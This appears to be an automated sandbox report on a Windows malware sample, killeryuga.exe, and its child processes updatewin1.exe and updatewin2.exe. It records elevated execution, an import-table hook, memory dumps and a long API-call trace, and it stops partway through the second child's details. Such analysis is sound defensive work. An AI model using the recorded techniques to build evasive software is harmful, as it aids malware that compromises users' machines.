Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:00, Reason: Child Process
Unmonitor End Time: 00:01:03, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
»
Information Value
PID 0x9ec
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9F0
0x 9F4
0x 9F8
0x A04
0x A08
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x00275000 0x00275FFF Marked Executable - 32-bit - False
...
updatewin1.exe 0x00400000 0x0044CFFF Forced - 32-bit - False
...
updatewin1.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False
...
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000260000:+0x16795 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x00000000007f0000:+0x77f6f6
...
Threads
Thread 0x9f0
671 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-03-24 16:36:35 (UTC) True 1
Fn
System Get Time type = Ticks, time = 118685 True 1
Fn
System Get Time type = Performance Ctr, time = 18090393828 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System Get Time type = Ticks, time = 118716 True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76c34442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x75340000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x753581ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x749c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749dc544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:36 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 18121598718 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, show_window = SW_SHOW True 1
Fn
Module Get Handle module_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, base_address = 0x400000 True 2
Fn
Module Load module_name = api-ms-win-appmodel-runtime-l1-1-2, base_address = 0x0 False 1
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #9: updatewin2.exe
654 0
»
Information Value
ID #9
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:01:03, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
»
Information Value
PID 0x9fc
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
